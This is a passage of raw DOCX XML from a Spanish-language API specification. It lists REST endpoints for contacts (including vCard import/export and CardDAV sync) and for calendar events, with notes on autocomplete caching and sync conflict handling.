                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">limit?: number</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene contacto por ID</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Crea nuevo contacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">fullName: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">phones?: Phone[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">organization?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">jobTitle?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">notes?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">birthday?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Actualiza contacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Campos parciales de contacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina contacto</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/import</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Importa contactos desde vCard (.vcf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">file: multipart/form-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exporta contactos a vCard (.vcf)</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/contacts/sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sincroniza contactos con servidor CardDAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">force?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/contacts/autocomplete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">está optimizado para latencia sub-50ms: consulta únicamente contactos con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isFrequent: true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ordenados por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">usageCount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">descendente, utilizando el índice compuesto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{userId: 1, isFrequent: -1, usageCount: -1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Si no hay suficientes resultados entre los contactos frecuentes, expande la búsqueda al resto de contactos ordenados alfabéticamente. Los resultados se cachean en Redis con TTL de 5 minutos por prefijo de búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sincronización CardDAV vía tsdav utiliza ETags para detección de cambios concurrentes y sync-tokens para sincronización incremental, resolviendo conflictos a nivel de campo para minimizar pérdida de datos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[226]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="calendario"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.8 Calendario</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="1906"/>
        <w:gridCol w:w="2053"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Método</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Body Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Query Params</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista calendarios disponibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accountId?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/:calendarId/events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista eventos de un calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">start: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(ISO 8601),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">end: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(ISO 8601),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">includeRecurring?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: true)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/events/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obtiene detalle de un evento</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/:calendarId/events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Crea nuevo evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">summary: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">startDate: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">endDate: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">startTimezone: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">description?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">location?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allDay?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">recurrenceRule?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">attendees?: Attendee[]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">alarm?: AlarmConfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/events/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Actualiza evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Campos parciales de evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/events/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cancel?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(envía cancelación iTip)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/events/:id/respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responde a invitación (aceptar/declinar/tentativo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">status: 'accepted' \| 'declined' \| 'tentative'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">comment?: string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
